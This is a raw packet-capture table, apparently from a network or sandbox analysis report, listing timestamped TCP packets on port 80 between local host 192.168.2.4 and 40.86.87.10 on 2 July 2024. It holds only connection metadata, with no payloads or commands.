Jul 2, 2024 07:31:08.608278990 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:08.608309984 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:08.608336926 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:08.730454922 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:08.730480909 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:08.730493069 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:08.730581999 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:08.730622053 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:08.730624914 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:08.730638027 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:08.730659962 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:08.730671883 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:08.730676889 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:08.730685949 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:08.730703115 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:08.730731964 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:08.731003046 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:08.731013060 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:08.731024027 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:08.731041908 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:08.731045961 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:08.731054068 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:08.731065035 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:08.731070042 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:08.731100082 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:08.731268883 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:08.731342077 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:08.731353998 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:08.731367111 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:08.731378078 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:08.731389046 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:08.731389999 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:08.731412888 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:08.731436014 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:08.731686115 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:08.731697083 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:08.731708050 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:08.731719017 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:08.731729031 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:08.731745005 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:08.731776953 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:09.842910051 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.842928886 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.842941046 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.842971087 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:09.843012094 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:09.843112946 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.843125105 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.843136072 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.843146086 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.843152046 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:09.843158007 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.843183994 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:09.843209982 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:09.843379974 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.843391895 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.843404055 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.843415022 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.843422890 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:09.843427896 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.843439102 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:09.843441010 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.843452930 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.843462944 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.843466997 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:09.843476057 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.843481064 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:09.843487024 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.843494892 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:09.843523979 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:09.844000101 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.844016075 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.844027042 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.844038010 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.844043970 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:09.844049931 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.844058990 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.844060898 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:09.844070911 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.844083071 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.844089031 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:09.844093084 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.844103098 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:09.844105005 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.844115973 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.844121933 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:09.844127893 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.844139099 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.844150066 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.844153881 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:09.844161987 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.844172955 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.844181061 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:09.844198942 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:09.844212055 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:09.845006943 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.845019102 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.845030069 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.845041990 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.845050097 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:09.845052958 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.845063925 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:09.845066071 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.845077038 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.845088005 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.845098972 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:09.845098972 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.845110893 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.845115900 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:09.845122099 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.845132113 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.845138073 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:09.845144987 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.845156908 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.845169067 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.845171928 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:09.845180988 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.845195055 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:09.845208883 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:09.845247030 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:09.845808029 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.845818996 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.845824957 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.845829010 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.845833063 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.845839024 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.845841885 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.845846891 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.845851898 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.845863104 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.845868111 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.845880032 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.845889091 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.845900059 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.845901966 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:09.845911026 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.845911980 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:09.845921993 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.845932007 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.845942974 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:09.845943928 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.845954895 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.845963001 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:09.845966101 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.845978022 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:09.846002102 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:09.846776009 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.846787930 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.846797943 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.846808910 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.846820116 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.846824884 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:09.846831083 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.846842051 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.846853018 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.846857071 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:09.846864939 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.846877098 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.846884966 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:09.846888065 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.846899033 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:09.846899986 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.846911907 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.846919060 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:09.846924067 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.846935034 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.846940994 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:09.846946955 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.846957922 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.846967936 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:09.846982956 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:09.847009897 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:09.847790003 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.847801924 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.847812891 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.847822905 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.847827911 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.847837925 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:09.847837925 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.847848892 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.847860098 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.847870111 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.847881079 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.847889900 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.847901106 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.847904921 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:09.847913027 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.847923994 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.847932100 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:09.847937107 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.847948074 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.847953081 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:09.847969055 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:09.847996950 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:09.848705053 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.848716974 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.848733902 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.848747015 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.848751068 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:09.848757982 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.848759890 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:09.848768950 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.848783016 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.848784924 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:09.848794937 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.848804951 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.848817110 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.848817110 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:09.848825932 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:09.848829031 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.848839998 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.848845005 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:09.848851919 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.848856926 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.848862886 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.848869085 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.848877907 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:09.848907948 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:09.849736929 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.849750042 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.849760056 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.849771976 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.849781990 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.849790096 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:09.849793911 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.849805117 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.849811077 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:09.849817038 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.849828005 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.849828959 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:09.849838972 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.849847078 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:09.849849939 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.849860907 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.849870920 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.849874973 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:09.849883080 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.849894047 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.849901915 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:09.849906921 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.849914074 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:09.849919081 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.849931002 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:09.849961042 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:09.850447893 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.850460052 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.850496054 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:09.850511074 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:09.850590944 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.850603104 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.850640059 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:09.850838900 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.850850105 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.850862980 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.850873947 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.850881100 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:09.850888968 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.850909948 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:09.850935936 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:09.851049900 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.851062059 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.851073027 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.851084948 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.851097107 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.851097107 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:09.851106882 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.851119041 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.851124048 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:09.851130962 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.851136923 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:09.851142883 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.851152897 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.851165056 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:09.851170063 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.851190090 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:09.851202965 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:09.851641893 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.851659060 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.851676941 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.851687908 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.851691961 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:09.851700068 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.851711035 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:09.851711035 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.851722002 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.851728916 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:09.851733923 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.851743937 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.851753950 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:09.851754904 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.851767063 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.851773024 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:09.851779938 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.851790905 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.851793051 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:09.851803064 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.851809978 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:09.851814985 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.851825953 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.851835966 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.851840973 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:09.851846933 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.851871967 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:09.851880074 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:09.852415085 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.852427959 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.852459908 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:09.852624893 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.852638006 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.852648973 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.852659941 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.852670908 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.852682114 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.852689981 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:09.852694035 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.852705002 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.852709055 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:09.852715969 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.852722883 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:09.852727890 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.852739096 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.852741003 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:09.852750063 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.852761984 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.852770090 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:09.852773905 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.852787018 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.852796078 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:09.852797985 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.852809906 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:09.852813959 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.852835894 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:09.852861881 CEST	49730	80	192.168.2.4	40.86.87.10
